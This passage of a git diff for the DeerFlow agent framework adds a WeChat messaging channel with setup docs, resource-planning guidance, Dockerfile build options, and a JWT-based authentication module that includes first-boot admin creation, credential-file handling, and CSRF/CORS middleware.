Prerequisite: complete the "Configuration" steps above first (`make setup`). `make dev` requires a valid `config.yaml` in the project root (can be overridden via `DEER_FLOW_CONFIG_PATH`). Run `make doctor` to verify your setup before starting.
|
||||
On Windows, run the local development flow from Git Bash. Native `cmd.exe` and PowerShell shells are not supported for the bash-based service scripts, and WSL is not guaranteed to work because some scripts rely on Git for Windows utilities such as `cygpath`.
|
||||
|
||||
1. **Check prerequisites**:
|
||||
@@ -375,6 +368,7 @@ DeerFlow supports receiving tasks from messaging apps. Channels auto-start when
|
||||
| Telegram | Bot API (long-polling) | Easy |
|
||||
| Slack | Socket Mode | Moderate |
|
||||
| Feishu / Lark | WebSocket | Moderate |
|
||||
| WeChat | Tencent iLink (long-polling) | Moderate |
|
||||
| WeCom | WebSocket | Moderate |
|
||||
|
||||
**Configuration in `config.yaml`:**
|
||||
@@ -419,6 +413,19 @@ channels:
|
||||
bot_token: $TELEGRAM_BOT_TOKEN
|
||||
allowed_users: [] # empty = allow all
|
||||
|
||||
wechat:
|
||||
enabled: false
|
||||
bot_token: $WECHAT_BOT_TOKEN
|
||||
ilink_bot_id: $WECHAT_ILINK_BOT_ID
|
||||
qrcode_login_enabled: true # optional: allow first-time QR bootstrap when bot_token is absent
|
||||
allowed_users: [] # empty = allow all
|
||||
polling_timeout: 35
|
||||
state_dir: ./.deer-flow/wechat/state
|
||||
max_inbound_image_bytes: 20971520
|
||||
max_outbound_image_bytes: 20971520
|
||||
max_inbound_file_bytes: 52428800
|
||||
max_outbound_file_bytes: 52428800
|
||||
|
||||
# Optional: per-channel / per-user session settings
|
||||
session:
|
||||
assistant_id: mobile-agent # custom agent names are also supported here
|
||||
@@ -452,6 +459,10 @@ SLACK_APP_TOKEN=xapp-...
|
||||
FEISHU_APP_ID=cli_xxxx
|
||||
FEISHU_APP_SECRET=your_app_secret
|
||||
|
||||
# WeChat iLink
|
||||
WECHAT_BOT_TOKEN=your_ilink_bot_token
|
||||
WECHAT_ILINK_BOT_ID=your_ilink_bot_id
|
||||
|
||||
# WeCom
|
||||
WECOM_BOT_ID=your_bot_id
|
||||
WECOM_BOT_SECRET=your_bot_secret
|
||||
@@ -477,6 +488,14 @@ WECOM_BOT_SECRET=your_bot_secret
|
||||
3. Under **Events**, subscribe to `im.message.receive_v1` and select **Long Connection** mode.
|
||||
4. Copy the App ID and App Secret. Set `FEISHU_APP_ID` and `FEISHU_APP_SECRET` in `.env` and enable the channel in `config.yaml`.
|
||||
|
||||
**WeChat Setup**
|
||||
|
||||
1. Enable the `wechat` channel in `config.yaml`.
|
||||
2. Either set `WECHAT_BOT_TOKEN` in `.env`, or set `qrcode_login_enabled: true` for first-time QR bootstrap.
|
||||
3. When `bot_token` is absent and QR bootstrap is enabled, watch backend logs for the QR content returned by iLink and complete the binding flow.
|
||||
4. After the QR flow succeeds, DeerFlow persists the acquired token under `state_dir` for later restarts.
|
||||
5. For Docker Compose deployments, keep `state_dir` on a persistent volume so the `get_updates_buf` cursor and saved auth state survive restarts.
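
As an illustration of step 5, one way to keep `state_dir` on a named volume is a Compose override like the sketch below; the service name and container-side path are assumptions for this sketch, not values taken from the repository's compose files.

```yaml
# docker-compose.override.yml (sketch only; service name "backend" and the
# container path are assumptions, so align them with your real compose file)
services:
  backend:
    volumes:
      - wechat-state:/app/.deer-flow/wechat/state   # matches state_dir in config.yaml
volumes:
  wechat-state:
```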
|
||||
|
||||
**WeCom Setup**
|
||||
|
||||
1. Create a bot on the WeCom AI Bot platform and obtain the `bot_id` and `bot_secret`.
|
||||
|
||||
@@ -40,6 +40,7 @@ https://github.com/user-attachments/assets/a8bcadc4-e040-4cf2-8fda-dd768b999c18
|
||||
- [快速开始](#快速开始)
|
||||
- [配置](#配置)
|
||||
- [运行应用](#运行应用)
|
||||
- [部署建议与资源规划](#部署建议与资源规划)
|
||||
- [方式一:Docker(推荐)](#方式一docker推荐)
|
||||
- [方式二:本地开发](#方式二本地开发)
|
||||
- [进阶配置](#进阶配置)
|
||||
@@ -150,6 +151,20 @@ https://github.com/user-attachments/assets/a8bcadc4-e040-4cf2-8fda-dd768b999c18
|
||||
|
||||
### 运行应用
|
||||
|
||||
#### 部署建议与资源规划
|
||||
|
||||
可以先按下面的资源档位来选择 DeerFlow 的运行方式:
|
||||
|
||||
| 部署场景 | 起步配置 | 推荐配置 | 说明 |
|
||||
|---------|-----------|------------|-------|
|
||||
| 本地体验 / `make dev` | 4 vCPU、8 GB 内存、20 GB SSD 可用空间 | 8 vCPU、16 GB 内存 | 适合单个开发者或单个轻量会话,且模型走外部 API。`2 核 / 4 GB` 通常跑不稳。 |
|
||||
| Docker 开发 / `make docker-start` | 4 vCPU、8 GB 内存、25 GB SSD 可用空间 | 8 vCPU、16 GB 内存 | 镜像构建、源码挂载和 sandbox 容器都会比纯本地模式更吃资源。 |
|
||||
| 长期运行服务 / `make up` | 8 vCPU、16 GB 内存、40 GB SSD 可用空间 | 16 vCPU、32 GB 内存 | 更适合共享环境、多 agent 任务、报告生成或更重的 sandbox 负载。 |
|
||||
|
||||
- 上面的配置只覆盖 DeerFlow 本身;如果你还要本机部署本地大模型,请单独为模型服务预留资源。
|
||||
- 持续运行的服务更推荐使用 Linux + Docker。macOS 和 Windows 更适合作为开发机或体验环境。
|
||||
- 如果 CPU 或内存长期打满,先降低并发会话或重任务数量,再考虑升级到更高一档配置。
|
||||
|
||||
#### 方式一:Docker(推荐)
|
||||
|
||||
**开发模式**(支持热更新,挂载源码):
|
||||
|
||||
+7
-5
@@ -395,14 +395,16 @@ Both can be modified at runtime via Gateway API endpoints or `DeerFlowClient` me
|
||||
**Architecture**: Imports the same `deerflow` modules that LangGraph Server and Gateway API use. Shares the same config files and data directories. No FastAPI dependency.
|
||||
|
||||
**Agent Conversation** (replaces LangGraph Server):
|
||||
- `chat(message, thread_id)` — synchronous, returns final text
|
||||
- `stream(message, thread_id)` — yields `StreamEvent` aligned with LangGraph SSE protocol:
|
||||
- `"values"` — full state snapshot (title, messages, artifacts)
|
||||
- `"messages-tuple"` — per-message update (AI text, tool calls, tool results)
|
||||
- `"end"` — stream finished
|
||||
- `chat(message, thread_id)` — synchronous, accumulates streaming deltas per message-id and returns the final AI text
|
||||
- `stream(message, thread_id)` — subscribes to LangGraph `stream_mode=["values", "messages", "custom"]` and yields `StreamEvent` (a consumption sketch follows this list):
|
||||
- `"values"` — full state snapshot (title, messages, artifacts); AI text already delivered via `messages` mode is **not** re-synthesized here to avoid duplicate deliveries
|
||||
- `"messages-tuple"` — per-chunk update: for AI text this is a **delta** (concat per `id` to rebuild the full message); tool calls and tool results are emitted once each
|
||||
- `"custom"` — forwarded from `StreamWriter`
|
||||
- `"end"` — stream finished (carries cumulative `usage` counted once per message id)
|
||||
- Agent created lazily via `create_agent()` + `_build_middlewares()`, same as `make_lead_agent`
|
||||
- Supports `checkpointer` parameter for state persistence across turns
|
||||
- `reset_agent()` forces agent recreation (e.g. after memory or skill changes)
|
||||
- See [docs/STREAMING.md](docs/STREAMING.md) for the full design: why Gateway and DeerFlowClient are parallel paths, LangGraph's `stream_mode` semantics, the per-id dedup invariants, and regression testing strategy
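
A minimal consumption sketch follows, assuming the client is importable as shown and that `StreamEvent` exposes an `event` name and a `data` payload; the import path, those field names, and the message-chunk keys (`id`, `type`, `content`) are assumptions for illustration, not the confirmed API. It relies only on the dedup rule stated above: AI text arrives as `messages-tuple` deltas, so concatenating per message id rebuilds the final text without double-counting the `values` snapshots.

```python
# Sketch: rebuild per-message AI text from streaming deltas (field names are assumptions).
from collections import defaultdict

from deerflow.client import DeerFlowClient  # import path assumed for this sketch

client = DeerFlowClient()
texts: dict[str, str] = defaultdict(str)  # message id -> accumulated AI text

for event in client.stream("Summarize today's AI news", thread_id="demo-thread"):
    if event.event == "messages-tuple":
        msg = event.data  # assumed: dict-like chunk with "id", "type", "content"
        if msg.get("type") == "ai" and msg.get("content"):
            texts[msg["id"]] += msg["content"]  # deltas: concat per id to rebuild the message
    elif event.event == "custom":
        print("custom:", event.data)  # forwarded from StreamWriter
    elif event.event == "end":
        print("usage:", event.data.get("usage"))  # cumulative usage, counted once per message id

for message_id, text in texts.items():
    print(message_id, ":", text)
```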
|
||||
|
||||
**Gateway Equivalent Methods** (replaces Gateway API):
|
||||
|
||||
|
||||
+6
-2
@@ -13,6 +13,9 @@ FROM python:3.12-slim-bookworm AS builder
|
||||
ARG NODE_MAJOR=22
|
||||
ARG APT_MIRROR
|
||||
ARG UV_INDEX_URL
|
||||
# Optional extras to install (e.g. "postgres" for PostgreSQL support)
|
||||
# Usage: docker build --build-arg UV_EXTRAS=postgres ...
|
||||
ARG UV_EXTRAS
|
||||
|
||||
# Optionally override apt mirror for restricted networks (e.g. APT_MIRROR=mirrors.aliyun.com)
|
||||
RUN if [ -n "${APT_MIRROR}" ]; then \
|
||||
@@ -43,8 +46,9 @@ WORKDIR /app
|
||||
COPY backend ./backend
|
||||
|
||||
# Install dependencies with cache mount
|
||||
# When UV_EXTRAS is set (e.g. "postgres"), installs optional dependencies.
|
||||
RUN --mount=type=cache,target=/root/.cache/uv \
|
||||
sh -c "cd backend && UV_INDEX_URL=${UV_INDEX_URL:-https://pypi.org/simple} uv sync"
|
||||
sh -c "cd backend && UV_INDEX_URL=${UV_INDEX_URL:-https://pypi.org/simple} uv sync ${UV_EXTRAS:+--extra $UV_EXTRAS}"
|
||||
|
||||
# ── Stage 2: Dev ──────────────────────────────────────────────────────────────
|
||||
# Retains compiler toolchain from builder so startup-time `uv sync` can build
|
||||
@@ -84,4 +88,4 @@ COPY --from=builder /app/backend ./backend
|
||||
EXPOSE 8001 2024
|
||||
|
||||
# Default command (can be overridden in docker-compose)
|
||||
CMD ["sh", "-c", "cd backend && PYTHONPATH=. uv run uvicorn app.gateway.app:app --host 0.0.0.0 --port 8001"]
|
||||
CMD ["sh", "-c", "cd backend && PYTHONPATH=. uv run --no-sync uvicorn app.gateway.app:app --host 0.0.0.0 --port 8001"]
|
||||
|
||||
@@ -8,6 +8,7 @@ import mimetypes
|
||||
import re
|
||||
import time
|
||||
from collections.abc import Awaitable, Callable, Mapping
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
@@ -37,6 +38,7 @@ CHANNEL_CAPABILITIES = {
|
||||
"feishu": {"supports_streaming": True},
|
||||
"slack": {"supports_streaming": False},
|
||||
"telegram": {"supports_streaming": False},
|
||||
"wechat": {"supports_streaming": False},
|
||||
"wecom": {"supports_streaming": True},
|
||||
}
|
||||
|
||||
@@ -78,7 +80,24 @@ async def _read_wecom_inbound_file(file_info: dict[str, Any], client: httpx.Asyn
|
||||
return decrypt_file(data, aeskey)
|
||||
|
||||
|
||||
async def _read_wechat_inbound_file(file_info: dict[str, Any], client: httpx.AsyncClient) -> bytes | None:
|
||||
raw_path = file_info.get("path")
|
||||
if isinstance(raw_path, str) and raw_path.strip():
|
||||
try:
|
||||
return await asyncio.to_thread(Path(raw_path).read_bytes)
|
||||
except OSError:
|
||||
logger.exception("[Manager] failed to read WeChat inbound file from local path: %s", raw_path)
|
||||
return None
|
||||
|
||||
full_url = file_info.get("full_url")
|
||||
if isinstance(full_url, str) and full_url.strip():
|
||||
return await _read_http_inbound_file({"url": full_url}, client)
|
||||
|
||||
return None
|
||||
|
||||
|
||||
register_inbound_file_reader("wecom", _read_wecom_inbound_file)
|
||||
register_inbound_file_reader("wechat", _read_wechat_inbound_file)
|
||||
|
||||
|
||||
class InvalidChannelSessionConfigError(ValueError):
|
||||
|
||||
@@ -18,6 +18,7 @@ _CHANNEL_REGISTRY: dict[str, str] = {
|
||||
"feishu": "app.channels.feishu:FeishuChannel",
|
||||
"slack": "app.channels.slack:SlackChannel",
|
||||
"telegram": "app.channels.telegram:TelegramChannel",
|
||||
"wechat": "app.channels.wechat:WechatChannel",
|
||||
"wecom": "app.channels.wecom:WeComChannel",
|
||||
}
|
||||
|
||||
|
||||
File diff suppressed because it is too large
+161
-1
@@ -1,16 +1,23 @@
|
||||
import logging
|
||||
import os
|
||||
from collections.abc import AsyncGenerator
|
||||
from contextlib import asynccontextmanager
|
||||
from datetime import UTC
|
||||
|
||||
from fastapi import FastAPI
|
||||
from fastapi.middleware.cors import CORSMiddleware
|
||||
|
||||
from app.gateway.auth_middleware import AuthMiddleware
|
||||
from app.gateway.config import get_gateway_config
|
||||
from app.gateway.csrf_middleware import CSRFMiddleware
|
||||
from app.gateway.deps import langgraph_runtime
|
||||
from app.gateway.routers import (
|
||||
agents,
|
||||
artifacts,
|
||||
assistants_compat,
|
||||
auth,
|
||||
channels,
|
||||
feedback,
|
||||
mcp,
|
||||
memory,
|
||||
models,
|
||||
@@ -33,6 +40,125 @@ logging.basicConfig(
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
async def _ensure_admin_user(app: FastAPI) -> None:
|
||||
"""Auto-create the admin user on first boot if no users exist.
|
||||
|
||||
After admin creation, migrate orphan threads from the LangGraph
|
||||
store (metadata.owner_id unset) to the admin account. This is the
|
||||
"no-auth → with-auth" upgrade path: users who ran DeerFlow without
|
||||
authentication have existing LangGraph thread data that needs an
|
||||
owner assigned.
|
||||
|
||||
No SQL persistence migration is needed: the four owner_id columns
|
||||
(threads_meta, runs, run_events, feedback) only come into existence
|
||||
alongside the auth module via create_all, so freshly created tables
|
||||
never contain NULL-owner rows. "Existing persistence DB + new auth"
|
||||
is not a supported upgrade path — fresh install or wipe-and-retry.
|
||||
|
||||
Multi-worker safe: relies on SQLite UNIQUE constraint to resolve
|
||||
races during admin creation. Only the worker that successfully
|
||||
creates/updates the admin prints the password; losers silently skip.
|
||||
"""
|
||||
import secrets
|
||||
|
||||
from app.gateway.auth.credential_file import write_initial_credentials
|
||||
from app.gateway.deps import get_local_provider
|
||||
|
||||
def _announce_credentials(email: str, password: str, *, label: str, headline: str) -> None:
|
||||
"""Write the password to a 0600 file and log the path (never the secret)."""
|
||||
cred_path = write_initial_credentials(email, password, label=label)
|
||||
logger.info("=" * 60)
|
||||
logger.info(" %s", headline)
|
||||
logger.info(" Credentials written to: %s (mode 0600)", cred_path)
|
||||
logger.info(" Change it after login: Settings -> Account")
|
||||
logger.info("=" * 60)
|
||||
|
||||
provider = get_local_provider()
|
||||
user_count = await provider.count_users()
|
||||
|
||||
admin = None
|
||||
|
||||
if user_count == 0:
|
||||
password = secrets.token_urlsafe(16)
|
||||
try:
|
||||
admin = await provider.create_user(email="admin@deerflow.dev", password=password, system_role="admin", needs_setup=True)
|
||||
except ValueError:
|
||||
return # Another worker already created the admin.
|
||||
_announce_credentials(admin.email, password, label="initial", headline="Admin account created on first boot")
|
||||
else:
|
||||
# Admin exists but setup never completed — reset password so operator
|
||||
# can always find it in the console without needing the CLI.
|
||||
# Multi-worker guard: if admin was created less than 30s ago, another
|
||||
# worker just created it and will print the password — skip reset.
|
||||
admin = await provider.get_user_by_email("admin@deerflow.dev")
|
||||
if admin and admin.needs_setup:
|
||||
import time
|
||||
|
||||
age = time.time() - admin.created_at.replace(tzinfo=UTC).timestamp()
|
||||
if age >= 30:
|
||||
from app.gateway.auth.password import hash_password_async
|
||||
|
||||
password = secrets.token_urlsafe(16)
|
||||
admin.password_hash = await hash_password_async(password)
|
||||
admin.token_version += 1
|
||||
await provider.update_user(admin)
|
||||
_announce_credentials(admin.email, password, label="reset", headline="Admin account setup incomplete — password reset")
|
||||
|
||||
if admin is None:
|
||||
return # Nothing to bind orphans to.
|
||||
|
||||
admin_id = str(admin.id)
|
||||
|
||||
# LangGraph store orphan migration — non-fatal.
|
||||
# This covers the "no-auth → with-auth" upgrade path for users
|
||||
# whose existing LangGraph thread metadata has no owner_id set.
|
||||
store = getattr(app.state, "store", None)
|
||||
if store is not None:
|
||||
try:
|
||||
migrated = await _migrate_orphaned_threads(store, admin_id)
|
||||
if migrated:
|
||||
logger.info("Migrated %d orphan LangGraph thread(s) to admin", migrated)
|
||||
except Exception:
|
||||
logger.exception("LangGraph thread migration failed (non-fatal)")
|
||||
|
||||
|
||||
async def _iter_store_items(store, namespace, *, page_size: int = 500):
|
||||
"""Paginated async iterator over a LangGraph store namespace.
|
||||
|
||||
Replaces the old hardcoded ``limit=1000`` call with a cursor-style
|
||||
loop so that environments with more than one page of orphans do
|
||||
not silently lose data. Terminates when a page is empty OR when a
|
||||
short page arrives (indicating the last page).
|
||||
"""
|
||||
offset = 0
|
||||
while True:
|
||||
batch = await store.asearch(namespace, limit=page_size, offset=offset)
|
||||
if not batch:
|
||||
return
|
||||
for item in batch:
|
||||
yield item
|
||||
if len(batch) < page_size:
|
||||
return
|
||||
offset += page_size
|
||||
|
||||
|
||||
async def _migrate_orphaned_threads(store, admin_user_id: str) -> int:
|
||||
"""Migrate LangGraph store threads with no owner_id to the given admin.
|
||||
|
||||
Uses cursor pagination so all orphans are migrated regardless of
|
||||
count. Returns the number of rows migrated.
|
||||
"""
|
||||
migrated = 0
|
||||
async for item in _iter_store_items(store, ("threads",)):
|
||||
metadata = item.value.get("metadata", {})
|
||||
if not metadata.get("owner_id"):
|
||||
metadata["owner_id"] = admin_user_id
|
||||
item.value["metadata"] = metadata
|
||||
await store.aput(("threads",), item.key, item.value)
|
||||
migrated += 1
|
||||
return migrated
|
||||
|
||||
|
||||
@asynccontextmanager
|
||||
async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]:
|
||||
"""Application lifespan handler."""
|
||||
@@ -52,6 +178,10 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]:
|
||||
async with langgraph_runtime(app):
|
||||
logger.info("LangGraph runtime initialised")
|
||||
|
||||
# Ensure admin user exists (auto-create on first boot)
|
||||
# Must run AFTER langgraph_runtime so app.state.store is available for thread migration
|
||||
await _ensure_admin_user(app)
|
||||
|
||||
# Start IM channel service if any channels are configured
|
||||
try:
|
||||
from app.channels.service import start_channel_service
|
||||
@@ -163,7 +293,31 @@ This gateway provides custom endpoints for models, MCP configuration, skills, an
|
||||
],
|
||||
)
|
||||
|
||||
# CORS is handled by nginx - no need for FastAPI middleware
|
||||
# Auth: reject unauthenticated requests to non-public paths (fail-closed safety net)
|
||||
app.add_middleware(AuthMiddleware)
|
||||
|
||||
# CSRF: Double Submit Cookie pattern for state-changing requests
|
||||
app.add_middleware(CSRFMiddleware)
|
||||
|
||||
# CORS: when GATEWAY_CORS_ORIGINS is set (dev without nginx), add CORS middleware.
|
||||
# In production, nginx handles CORS and no middleware is needed.
|
||||
cors_origins_env = os.environ.get("GATEWAY_CORS_ORIGINS", "")
|
||||
if cors_origins_env:
|
||||
cors_origins = [o.strip() for o in cors_origins_env.split(",") if o.strip()]
|
||||
# Validate: wildcard origin with credentials is a security misconfiguration
|
||||
for origin in cors_origins:
|
||||
if origin == "*":
|
||||
logger.error("GATEWAY_CORS_ORIGINS contains wildcard '*' with allow_credentials=True. This is a security misconfiguration — browsers will reject the response. Use explicit scheme://host:port origins instead.")
|
||||
cors_origins = [o for o in cors_origins if o != "*"]
|
||||
break
|
||||
if cors_origins:
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=cors_origins,
|
||||
allow_credentials=True,
|
||||
allow_methods=["*"],
|
||||
allow_headers=["*"],
|
||||
)
|
||||
|
||||
# Include routers
|
||||
# Models API is mounted at /api/models
|
||||
@@ -199,6 +353,12 @@ This gateway provides custom endpoints for models, MCP configuration, skills, an
|
||||
# Assistants compatibility API (LangGraph Platform stub)
|
||||
app.include_router(assistants_compat.router)
|
||||
|
||||
# Auth API is mounted at /api/v1/auth
|
||||
app.include_router(auth.router)
|
||||
|
||||
# Feedback API is mounted at /api/threads/{thread_id}/runs/{run_id}/feedback
|
||||
app.include_router(feedback.router)
|
||||
|
||||
# Thread Runs API (LangGraph Platform-compatible runs lifecycle)
|
||||
app.include_router(thread_runs.router)
|
||||
|
||||
|
||||
@@ -0,0 +1,42 @@
|
||||
"""Authentication module for DeerFlow.
|
||||
|
||||
This module provides:
|
||||
- JWT-based authentication
|
||||
- Provider Factory pattern for extensible auth methods
|
||||
- UserRepository interface for storage backends (SQLite)
|
||||
"""
|
||||
|
||||
from app.gateway.auth.config import AuthConfig, get_auth_config, set_auth_config
|
||||
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse, TokenError
|
||||
from app.gateway.auth.jwt import TokenPayload, create_access_token, decode_token
|
||||
from app.gateway.auth.local_provider import LocalAuthProvider
|
||||
from app.gateway.auth.models import User, UserResponse
|
||||
from app.gateway.auth.password import hash_password, verify_password
|
||||
from app.gateway.auth.providers import AuthProvider
|
||||
from app.gateway.auth.repositories.base import UserRepository
|
||||
|
||||
__all__ = [
|
||||
# Config
|
||||
"AuthConfig",
|
||||
"get_auth_config",
|
||||
"set_auth_config",
|
||||
# Errors
|
||||
"AuthErrorCode",
|
||||
"AuthErrorResponse",
|
||||
"TokenError",
|
||||
# JWT
|
||||
"TokenPayload",
|
||||
"create_access_token",
|
||||
"decode_token",
|
||||
# Password
|
||||
"hash_password",
|
||||
"verify_password",
|
||||
# Models
|
||||
"User",
|
||||
"UserResponse",
|
||||
# Providers
|
||||
"AuthProvider",
|
||||
"LocalAuthProvider",
|
||||
# Repository
|
||||
"UserRepository",
|
||||
]
|
||||
@@ -0,0 +1,57 @@
|
||||
"""Authentication configuration for DeerFlow."""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import secrets
|
||||
|
||||
from dotenv import load_dotenv
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
load_dotenv()
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AuthConfig(BaseModel):
|
||||
"""JWT and auth-related configuration. Parsed once at startup.
|
||||
|
||||
Note: the ``users`` table now lives in the shared persistence
|
||||
database managed by ``deerflow.persistence.engine``. The old
|
||||
``users_db_path`` config key has been removed — user storage is
|
||||
configured through ``config.database`` like every other table.
|
||||
"""
|
||||
|
||||
jwt_secret: str = Field(
|
||||
...,
|
||||
description="Secret key for JWT signing. MUST be set via AUTH_JWT_SECRET.",
|
||||
)
|
||||
token_expiry_days: int = Field(default=7, ge=1, le=30)
|
||||
oauth_github_client_id: str | None = Field(default=None)
|
||||
oauth_github_client_secret: str | None = Field(default=None)
|
||||
|
||||
|
||||
_auth_config: AuthConfig | None = None
|
||||
|
||||
|
||||
def get_auth_config() -> AuthConfig:
|
||||
"""Get the global AuthConfig instance. Parses from env on first call."""
|
||||
global _auth_config
|
||||
if _auth_config is None:
|
||||
jwt_secret = os.environ.get("AUTH_JWT_SECRET")
|
||||
if not jwt_secret:
|
||||
jwt_secret = secrets.token_urlsafe(32)
|
||||
os.environ["AUTH_JWT_SECRET"] = jwt_secret
|
||||
logger.warning(
|
||||
"⚠ AUTH_JWT_SECRET is not set — using an auto-generated ephemeral secret. "
|
||||
"Sessions will be invalidated on restart. "
|
||||
"For production, add AUTH_JWT_SECRET to your .env file: "
|
||||
'python -c "import secrets; print(secrets.token_urlsafe(32))"'
|
||||
)
|
||||
_auth_config = AuthConfig(jwt_secret=jwt_secret)
|
||||
return _auth_config
|
||||
|
||||
|
||||
def set_auth_config(config: AuthConfig) -> None:
|
||||
"""Set the global AuthConfig instance (for testing)."""
|
||||
global _auth_config
|
||||
_auth_config = config
|
||||
@@ -0,0 +1,48 @@
"""Write initial admin credentials to a restricted file instead of logs.

Logging secrets to stdout/stderr is a well-known CodeQL finding
(py/clear-text-logging-sensitive-data) — in production those logs
get collected into ELK/Splunk/etc and become a secret sprawl
source. This helper writes the credential to a 0600 file that only
the process user can read, and returns the path so the caller can
log **the path** (not the password) for the operator to pick up.
"""

from __future__ import annotations

import os
from pathlib import Path

from deerflow.config.paths import get_paths

_CREDENTIAL_FILENAME = "admin_initial_credentials.txt"


def write_initial_credentials(email: str, password: str, *, label: str = "initial") -> Path:
    """Write the admin email + password to ``{base_dir}/admin_initial_credentials.txt``.

    The file is created **atomically** with mode 0600 via ``os.open``
    so the password is never world-readable, even for the single syscall
    window between ``write_text`` and ``chmod``.

    ``label`` distinguishes "initial" (fresh creation) from "reset"
    (password reset) in the file header so an operator picking up the
    file after a restart can tell which event produced it.

    Returns the absolute :class:`Path` to the file.
    """
    target = get_paths().base_dir / _CREDENTIAL_FILENAME
    target.parent.mkdir(parents=True, exist_ok=True)

    content = (
        f"# DeerFlow admin {label} credentials\n# This file is generated on first boot or password reset.\n# Change the password after login via Settings -> Account,\n# then delete this file.\n#\nemail: {email}\npassword: {password}\n"
    )

    # Atomic 0600 create-or-truncate. O_TRUNC (not O_EXCL) so the
    # reset-password path can rewrite an existing file without a
    # separate unlink-then-create dance.
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(content)

    return target.resolve()
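A minimal usage sketch (not part of the diff) of how a caller might hand the generated credential file to an operator; the first-boot admin flow that would actually call this lives elsewhere in the PR and is assumed here:

```python
# Hypothetical caller sketch — log the location, never the password itself.
from app.gateway.auth.credential_file import write_initial_credentials

path = write_initial_credentials("admin@example.com", "generated-password", label="initial")
print(f"Initial admin credentials written to {path} (mode 0600)")
```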
@@ -0,0 +1,44 @@
"""Typed error definitions for auth module.

AuthErrorCode: exhaustive enum of all auth failure conditions.
TokenError: exhaustive enum of JWT decode failures.
AuthErrorResponse: structured error payload for HTTP responses.
"""

from enum import StrEnum

from pydantic import BaseModel


class AuthErrorCode(StrEnum):
    """Exhaustive list of auth error conditions."""

    INVALID_CREDENTIALS = "invalid_credentials"
    TOKEN_EXPIRED = "token_expired"
    TOKEN_INVALID = "token_invalid"
    USER_NOT_FOUND = "user_not_found"
    EMAIL_ALREADY_EXISTS = "email_already_exists"
    PROVIDER_NOT_FOUND = "provider_not_found"
    NOT_AUTHENTICATED = "not_authenticated"


class TokenError(StrEnum):
    """Exhaustive list of JWT decode failure reasons."""

    EXPIRED = "expired"
    INVALID_SIGNATURE = "invalid_signature"
    MALFORMED = "malformed"


class AuthErrorResponse(BaseModel):
    """Structured error response — replaces bare `detail` strings."""

    code: AuthErrorCode
    message: str


def token_error_to_code(err: TokenError) -> AuthErrorCode:
    """Map TokenError to AuthErrorCode — single source of truth."""
    if err == TokenError.EXPIRED:
        return AuthErrorCode.TOKEN_EXPIRED
    return AuthErrorCode.TOKEN_INVALID
@@ -0,0 +1,55 @@
"""JWT token creation and verification."""

from datetime import UTC, datetime, timedelta

import jwt
from pydantic import BaseModel

from app.gateway.auth.config import get_auth_config
from app.gateway.auth.errors import TokenError


class TokenPayload(BaseModel):
    """JWT token payload."""

    sub: str  # user_id
    exp: datetime
    iat: datetime | None = None
    ver: int = 0  # token_version — must match User.token_version


def create_access_token(user_id: str, expires_delta: timedelta | None = None, token_version: int = 0) -> str:
    """Create a JWT access token.

    Args:
        user_id: The user's UUID as string
        expires_delta: Optional custom expiry, defaults to 7 days
        token_version: User's current token_version for invalidation

    Returns:
        Encoded JWT string
    """
    config = get_auth_config()
    expiry = expires_delta or timedelta(days=config.token_expiry_days)

    now = datetime.now(UTC)
    payload = {"sub": user_id, "exp": now + expiry, "iat": now, "ver": token_version}
    return jwt.encode(payload, config.jwt_secret, algorithm="HS256")


def decode_token(token: str) -> TokenPayload | TokenError:
    """Decode and validate a JWT token.

    Returns:
        TokenPayload if valid, or a specific TokenError variant.
    """
    config = get_auth_config()
    try:
        payload = jwt.decode(token, config.jwt_secret, algorithms=["HS256"])
        return TokenPayload(**payload)
    except jwt.ExpiredSignatureError:
        return TokenError.EXPIRED
    except jwt.InvalidSignatureError:
        return TokenError.INVALID_SIGNATURE
    except jwt.PyJWTError:
        return TokenError.MALFORMED
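For orientation, a small sketch (the user id is made up) of the union-return style that callers of this module are expected to handle, rather than catching PyJWT exceptions themselves:

```python
from app.gateway.auth.errors import TokenError, token_error_to_code
from app.gateway.auth.jwt import create_access_token, decode_token

token = create_access_token(user_id="00000000-0000-0000-0000-000000000001", token_version=0)
result = decode_token(token)
if isinstance(result, TokenError):
    # At the route layer this maps to a 401 via token_error_to_code(result).
    print("rejected:", token_error_to_code(result))
else:
    print(result.sub, result.ver)  # TokenPayload fields
```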
@@ -0,0 +1,87 @@
"""Local email/password authentication provider."""

from app.gateway.auth.models import User
from app.gateway.auth.password import hash_password_async, verify_password_async
from app.gateway.auth.providers import AuthProvider
from app.gateway.auth.repositories.base import UserRepository


class LocalAuthProvider(AuthProvider):
    """Email/password authentication provider using local database."""

    def __init__(self, repository: UserRepository):
        """Initialize with a UserRepository.

        Args:
            repository: UserRepository implementation (SQLite)
        """
        self._repo = repository

    async def authenticate(self, credentials: dict) -> User | None:
        """Authenticate with email and password.

        Args:
            credentials: dict with 'email' and 'password' keys

        Returns:
            User if authentication succeeds, None otherwise
        """
        email = credentials.get("email")
        password = credentials.get("password")

        if not email or not password:
            return None

        user = await self._repo.get_user_by_email(email)
        if user is None:
            return None

        if user.password_hash is None:
            # OAuth user without local password
            return None

        if not await verify_password_async(password, user.password_hash):
            return None

        return user

    async def get_user(self, user_id: str) -> User | None:
        """Get user by ID."""
        return await self._repo.get_user_by_id(user_id)

    async def create_user(self, email: str, password: str | None = None, system_role: str = "user", needs_setup: bool = False) -> User:
        """Create a new local user.

        Args:
            email: User email address
            password: Plain text password (will be hashed)
            system_role: Role to assign ("admin" or "user")
            needs_setup: If True, user must complete setup on first login

        Returns:
            Created User instance
        """
        password_hash = await hash_password_async(password) if password else None
        user = User(
            email=email,
            password_hash=password_hash,
            system_role=system_role,
            needs_setup=needs_setup,
        )
        return await self._repo.create_user(user)

    async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
        """Get user by OAuth provider and ID."""
        return await self._repo.get_user_by_oauth(provider, oauth_id)

    async def count_users(self) -> int:
        """Return total number of registered users."""
